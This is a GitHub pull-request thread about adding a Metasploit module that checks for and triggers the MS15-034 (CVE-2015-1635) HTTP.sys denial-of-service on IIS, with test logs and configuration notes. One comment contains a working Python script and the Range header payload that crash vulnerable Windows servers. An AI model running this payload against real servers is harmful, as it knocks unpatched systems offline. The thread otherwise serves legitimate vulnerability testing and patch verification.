Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add MS15-034 (CVE-2015-1635) https.sys Request Handling Denial-of-Service (and check) #5150

Merged
merged 9 commits into from Apr 15, 2015

Conversation

@wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented Apr 15, 2015

I didn't do much, I found a work-in-progress code here: http://pastebin.com/raw.php?i=ypURDPc4

I tested it and worked on my IIS:

screen shot 2015-04-15 at 1 46 48 am

So I ported that to Metasploit. This MSF module can do two things:

  1. It can check if the target is vulnerable or not (if you use the check command)
  2. It can dos the target (if you use the run command, but the check will kick in first)

Here's how you can test it:

  • Set up a Windows 7 SP1 box
  • Install IIS
  • Open IIS Manager, click on Default Web Site. You will see Output Caching there, double click on that, and then on the right you will see Edit Feature Settings: Make sure "Enable kernel cache" is enabled. By default it already is.
  • I added a .htm extension for kernel-mode caching too during testing, but this may not be necessary.
  • Run the module
msf auxiliary(ms15_034_ulonglongadd) > run

[*] 192.168.1.169:80 - DOS request sent
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Of if you see me in person, you can use my box, too.

@wchen-r7 wchen-r7 changed the title This module will check for MS15-034 (CVE-2015-1635) https.sys Request Handling Vulnerability Add MS15-034 (CVE-2015-1635) https.sys Request Handling Vulnerability Apr 15, 2015
@andresriancho
Copy link

@andresriancho andresriancho commented Apr 15, 2015

@wchen-r7 does this test crash the remote IIS / OS?

@andresriancho
Copy link

@andresriancho andresriancho commented Apr 15, 2015

I think I've found the answer here: https://ma.ttias.be/remote-code-execution-via-http-request-in-iis-on-windows/?hn

When sending such a request, it can trigger a blue screen on the Windows Server, effectively rendering it offline.

@wchen-r7
Copy link
Contributor Author

@wchen-r7 wchen-r7 commented Apr 15, 2015

@andresriancho Hmm it never DOS'd my IIS boxes (I had 3 for testing at the time). But let me double check again, this time I try more requests... bbl.

@FireFart
Copy link
Contributor

@FireFart FireFart commented Apr 15, 2015

i tried the exploit against a bunch of servers at work and none of them crashed. Maybe you need a special configuration so the blue screen is triggered.

@wchen-r7
Copy link
Contributor Author

@wchen-r7 wchen-r7 commented Apr 15, 2015

So Bill and I tested the code against Windows 7. I tried testing on Windows Server 2008 (32-bit) and that didn't work for me. Another box with 403 everything couldn't either. I have heard binary_raider saying the code works for Windows Server 2012: https://twitter.com/binary_raider/status/588260892707545088

@wchen-r7
Copy link
Contributor Author

@wchen-r7 wchen-r7 commented Apr 15, 2015

Another test: 1000 requests and no DOS. Maybe like @FireFart said, has to be something specific.

@wchen-r7
Copy link
Contributor Author

@wchen-r7 wchen-r7 commented Apr 15, 2015

I found a guy saying it DOS'd for him: http://www.reddit.com/r/netsec/comments/32n3m2/cve20151635_rce_in_windows_httpsys/cqd680s

So I'm gonna go ahead and add this in the description. Thanks all.

@FireFart
Copy link
Contributor

@FireFart FireFart commented Apr 15, 2015

Here is a video of a bluescreen on win2k12
https://www.youtube.com/watch?v=BlBXREzsytc&feature=youtu.be

@wchen-r7
Copy link
Contributor Author

@wchen-r7 wchen-r7 commented Apr 15, 2015

@FireFart Good find. Thanks!

@FireFart
Copy link
Contributor

@FireFart FireFart commented Apr 15, 2015

tried the output caching on win2k8 but I still can't trigger the bsod. I currently have no admin access to a win2k12 to try it out :(

return
end

if !res.headers['Server'].include?('Microsoft-IIS')

This comment has been minimized.

@Meatballs1

Meatballs1 Apr 15, 2015
Contributor

People may disable the server header. So maybe null, and also false negative.

Also may spoof it :)

This comment has been minimized.

@wchen-r7

wchen-r7 Apr 15, 2015
Author Contributor

That's true. I think I'm just going to get rid of this check. It doesn't feel important when it has a more explicit way to check.

Thanks.

@Meatballs1
Copy link
Contributor

@Meatballs1 Meatballs1 commented Apr 15, 2015

This won't cause a BSOD, try Range: bytes=18-18446744073709551615 instead

@Meatballs1
Copy link
Contributor

@Meatballs1 Meatballs1 commented Apr 15, 2015

n.b. can this be written as an auxiliary/dos/ module with a check?

@jamie-34254
Copy link

@jamie-34254 jamie-34254 commented Apr 15, 2015

You need to actually have some output caching rules enabled for this to work

@Meatballs1
Copy link
Contributor

@Meatballs1 Meatballs1 commented Apr 15, 2015

Worked for me against Windows 7 with default install of IIS... Did take a few triggers to BSOD.

@jamie-34254
Copy link

@jamie-34254 jamie-34254 commented Apr 15, 2015

What does your "Output Caching" tab show? Before I could get the exploit to work I had to add a rule to Output Caching to cache stuff to the Kernel-mode cache.

'Description' => %q{
This module will check if your hosts are vulnerable to CVE-2015-1635 (MS15-034). A
vulnerability in the HTTP Protocol stack (HTTP.sys) that could result in arbitrary code
execution. Please note this module could potentially cause a denail-of-service against

This comment has been minimized.

@Meatballs1

Meatballs1 Apr 15, 2015
Contributor

denial

@Meatballs1
Copy link
Contributor

@Meatballs1 Meatballs1 commented Apr 15, 2015

@wchen-r7 has this covered:

Open IIS Manager, click on Default Web Site. You will see Output Caching there, double click on that, and then on the right you will see Edit Feature Settings: Make sure "Enable kernel cache" is enabled. By default it already is.

@phillips321
Copy link

@phillips321 phillips321 commented Apr 15, 2015

That youtube vid is mine, i have 2012r2x64 and 2008r2x64 here to test against. 2008r2x64 didn't blue screen, it just caused the box to lock up. 2012r2x64 resulted in BSOD. I've heard people saying caching needs to be enabled and populated to be vuln..... oh, and Hi Meatballs!

res = send_request_raw({
'uri' => uri,
'method' => 'GET',
'vhost' => 'stuff',

This comment has been minimized.

@TomSellers

TomSellers Apr 15, 2015
Contributor

The module has a vhost option that doesn't appear to be used. Should this be changed in order to support VIP/virtual hosts?

This comment has been minimized.

@wchen-r7

wchen-r7 Apr 15, 2015
Author Contributor

Actually I don't really need this, I'll get rid of this line. Thanks.

@julianvilas
Copy link
Contributor

@julianvilas julianvilas commented Apr 15, 2015

This is supposed to give blue screen

#Tested on Win Srv 2012R2.
import socket,sys

if len(sys.argv)<=1:   
 sys.exit('Give me an IP')

Host = sys.argv[1]

def SendPayload(Payload, Host):
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect((Host, 80))
   s.send(Payload)
   s.recv(1024)
   s.close()

#Make sure iisstart.htm exist.
Init = "GET /iisstart.htm HTTP/1.0\r\n\r\n"
Payload = "GET /iisstart.htm HTTP/1.1\r\nHost: blah\r\nRange: bytes=18-18446744073709551615\r\n\r\n"

SendPayload(Init, Host)
SendPayload(Payload, Host)

via: https://twitter.com/PythonResponder/status/588364311422181376

@wchen-r7 wchen-r7 changed the title Add MS15-034 (CVE-2015-1635) https.sys Request Handling Denial-of-Service Add MS15-034 (CVE-2015-1635) https.sys Request Handling Denial-of-Service (and check) Apr 15, 2015
@jvazquez-r7 jvazquez-r7 self-assigned this Apr 15, 2015
@jvazquez-r7 jvazquez-r7 merged commit 76d36a4 into rapid7:master Apr 15, 2015
jvazquez-r7 added a commit that referenced this pull request Apr 15, 2015
* `check` to test, `run` to DoS
@jvazquez-r7
Copy link
Contributor

@jvazquez-r7 jvazquez-r7 commented Apr 15, 2015

Test:

msf auxiliary(ms15_034_ulonglongadd) > set rhosts 10.6.0.96
rhosts => 10.6.0.96
msf auxiliary(ms15_034_ulonglongadd) > check
[+] 10.6.0.96:80 - The target is vulnerable.
[*] Checked 1 of 1 hosts (100% complete)
msf auxiliary(ms15_034_ulonglongadd) > run

[*] 10.6.0.96:80 - DOS request sent
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Thanks @wchen-r7 !

'Description' => %q{
This module will check if your hosts are vulnerable to CVE-2015-1635 (MS15-034). A
vulnerability in the HTTP Protocol stack (HTTP.sys) that could result in arbitrary code
execution. This module will try to cause a denail-of-service.

This comment has been minimized.

@dmiller-nmap

dmiller-nmap Apr 15, 2015

Spelling here: s/denail/denial/

This comment has been minimized.

@wchen-r7

wchen-r7 Apr 15, 2015
Author Contributor

ah man. I need a spell checker for my text editor.

This comment has been minimized.

@wchen-r7

wchen-r7 Apr 15, 2015
Author Contributor

Correction submitted: #5155

Thanks.

@todb-r7
Copy link
Contributor

@todb-r7 todb-r7 commented Apr 15, 2015

thank YOU @wchen-r7 for the quick turnaround on the PoC.

@HsSec
Copy link

@HsSec HsSec commented Apr 15, 2015

is it vuln possible to execute shellcode meterpreter stager ?

@altonius
Copy link

@altonius altonius commented Apr 16, 2015

has anyone had any luck with running this against the WinRM service, which runs a HTTP service? could be another avenue to try.

@FireFart
Copy link
Contributor

@FireFart FireFart commented Apr 16, 2015

here is a translated version of an anlysis:
https://translate.google.com/translate?hl=en&sl=zh-CN&tl=en&u=http%3A%2F%2Fblogs.360.cn%2Fblog%2Fcve_2015_6135_http_rce_analysis&sandbox=1

It says So, for iisstart.htm, lower> = 310 and <647 can stabilize the trigger BSOD (in google translate english)

Maybe we can try this out?

@wchen-r7
Copy link
Contributor Author

@wchen-r7 wchen-r7 commented Apr 16, 2015

Yes we can try. I can work on this again this Friday.

@snobu
Copy link

@snobu snobu commented Apr 16, 2015

From ‏@Lee_Holmes:

MS015-034 vulnerability requires that services use Kernel Mode Caching in http.sys. WinRM and PowerShell Remoting do not.

https://twitter.com/Lee_Holmes/status/588464652708806656

@L34Rn
Copy link

@L34Rn L34Rn commented Apr 16, 2015

blue screen on 2008r2 iis7.5

@Meatballs1
Copy link
Contributor

@Meatballs1 Meatballs1 commented Apr 16, 2015

From ‏@Lee_Holmes:

MS015-034 vulnerability requires that services use Kernel Mode Caching in http.sys. WinRM and PowerShell Remoting do not.

Network Discovery 5357 is also a HTTP.sys service, but was also not vuln. 😢

You can list available HTTP.sys services with netsh http show iplisten

@TomSellers
Copy link
Contributor

@TomSellers TomSellers commented Apr 16, 2015

I don't see any results on that command but someone on twitter, I forget who, provided this one:

netsh http show servicestate

and look for Registered URLS. This seems to provide usable data in my environment.

@KevinBeaumont
Copy link

@KevinBeaumont KevinBeaumont commented Apr 17, 2015

One note on SANS FAQ - just because something uses HTTP.sys, doesn't mean it vuln to this. Kernel Mode Caching has to be called, which is pretty rare - e.g. IIS uses it for caching static content, and that's basically it.

Also to clear up another common misconception, this is not an RCE issue. It's a single integer overflow. Stop buying into the Qualys etc hype - they're just speculating.

@Meatballs1
Copy link
Contributor

@Meatballs1 Meatballs1 commented Apr 17, 2015

Doh I meant servicestate :D

N.b. pics on twitters of the tcp traffic indicates a memory leak - after the end of the response...

@snobu
Copy link

@snobu snobu commented Apr 17, 2015

Easily parsable with a PowerShell oneliner.

PS> $(netsh http show servicestate) -match 'HTTP' -replace ' ', '' | select -Skip 1
HTTP://+:5985/WSMAN/
HTTP://+:47001/WSMAN/
@wiredaem0n
Copy link

@wiredaem0n wiredaem0n commented Apr 17, 2015

A standalone python version.
http://pastebin.com/PpX8QS3y

todb-r7 added a commit to todb-r7/metasploit-framework that referenced this pull request May 6, 2015
Edited modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb first landed
in rapid7#5150, @wchen-r7's DOS module for CVE-2015-1635 HTTP.sys

Edited modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb
first landed in rapid7#5192, @joevennix's module for Safari CVE-2015-1126

Edited modules/auxiliary/gather/java_rmi_registry.rb first landed in

Edited modules/auxiliary/gather/ssllabs_scan.rb first landed in rapid7#5016,
add SSL Labs scanner

Edited modules/auxiliary/scanner/http/goahead_traversal.rb first landed
in rapid7#5101, Add Directory Traversal for GoAhead Web Server

Edited modules/auxiliary/scanner/http/owa_iis_internal_ip.rb first
landed in rapid7#5158, OWA internal IP disclosure scanner

Edited modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb
first landed in rapid7#5159, WordPress Mobile Edition Plugin File Read Vuln

Edited modules/exploits/linux/http/multi_ncc_ping_exec.rb first landed
in rapid7#4924, @m-1-k-3's DLink CVE-2015-1187 exploit

Edited modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb first
landed in rapid7#5131, WordPress Slideshow Upload

Edited modules/exploits/windows/local/run_as.rb first landed in rapid7#4649,
improve post/windows/manage/run_as and as an exploit

(These results courtesy of a delightful git alias, here:

```
  cleanup-prs = !"for i in `git status | grep modules | sed
s/#.*modules/modules/`; do echo -n \"Edited $i first landed in \" && git
log --oneline --first-parent $i | tail -1 | sed 's/.*Land //' && echo
''; done"

```

So that's kind of fun.
@erwanlr
Copy link
Contributor

@erwanlr erwanlr commented May 11, 2015

Small update on that one:

I was tested a client's server using a custom script and the MSF module to check it, both reported the target as vulnerable. Then, the client applied the patch and I retested it with the same stuff and cURL.

cURL reported it as fixed, the two others as vulnerable. After investigation, the remote server was still sending the cached response for my custom script and MSF based on the UserAgent being used.

e.g:

msf auxiliary(ms15_034_ulonglongadd) > check
[+] X.X.X.X:80 - The target is vulnerable.
[*] Checked 1 of 1 hosts (100% complete)


msf auxiliary(ms15_034_ulonglongadd) > set UserAgent 'Hello'
UserAgent => Hello
msf auxiliary(ms15_034_ulonglongadd) > check
[*] X.X.X.X:80 - The target is not exploitable.
[*] Checked 1 of 1 hosts (100% complete)

Not sure if this is the behaviour for all IIS or just a weird one I got :x

Anyway, it might be useful to add a random string to the UA to avoid such FP when retesting :)

@wchen-r7
Copy link
Contributor Author

@wchen-r7 wchen-r7 commented May 11, 2015

Thanks for the info!

@wchen-r7
Copy link
Contributor Author

@wchen-r7 wchen-r7 commented May 12, 2015

@erwanlr Hmm I'm not able to reproduce the behavior you described.

Here's the vulnerable response:

msf auxiliary(ms15_034_ulonglongadd) > check
[+] 192.168.1.138:80 - The target is vulnerable.
[*] Checked 1 of 1 hosts (100% complete)

Here's the patched response:

msf auxiliary(ms15_034_ulonglongadd) > check
[*] 192.168.1.138:80 - The target is not exploitable.
[*] Checked 1 of 1 hosts (100% complete)

Is it possible to give me more precise steps to reproduce this? (Including the server setup)

@erwanlr
Copy link
Contributor

@erwanlr erwanlr commented May 12, 2015

I retested using the exact same options (RHOSTS, VHOST and TARGETURI - was a css file -, all others were default values) and noticed that is was still reported as vulnerable whereas using cURL it wasn't.

Then, after playing with burp to determine what was going on, I found that when using the same User-Agent than the first check, the cached response was received.

I don't know the server setup unfortunately, all I can say is that it was an IIS 7.5 (but that won't really help :/)

If it was affecting all IIS, other people would have reported such weird behaviour, so I assume I just hit a unicorn :O

@wchen-r7
Copy link
Contributor Author

@wchen-r7 wchen-r7 commented May 12, 2015

OK, thanks! I will keep an eye on this and try to reproduce again.

@TomSellers
Copy link
Contributor

@TomSellers TomSellers commented May 12, 2015

If I recall correctly the patch requires a reboot. If the response is cached it is unlikely to be from the target. Perhaps a proxy? Or a test against a patched but not rebooted server?

Tom

On May 12, 2015, at 11:22 AM, sinn3r notifications@github.com wrote:

OK, thanks! I will keep an eye on this and try to reproduce again.


Reply to this email directly or view it on GitHub.

@erwanlr
Copy link
Contributor

@erwanlr erwanlr commented May 12, 2015

Ahhh, that must be the not rebooted server case as it was fixed during testing and the client didn't inform me of such thing.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

You can’t perform that action at this time.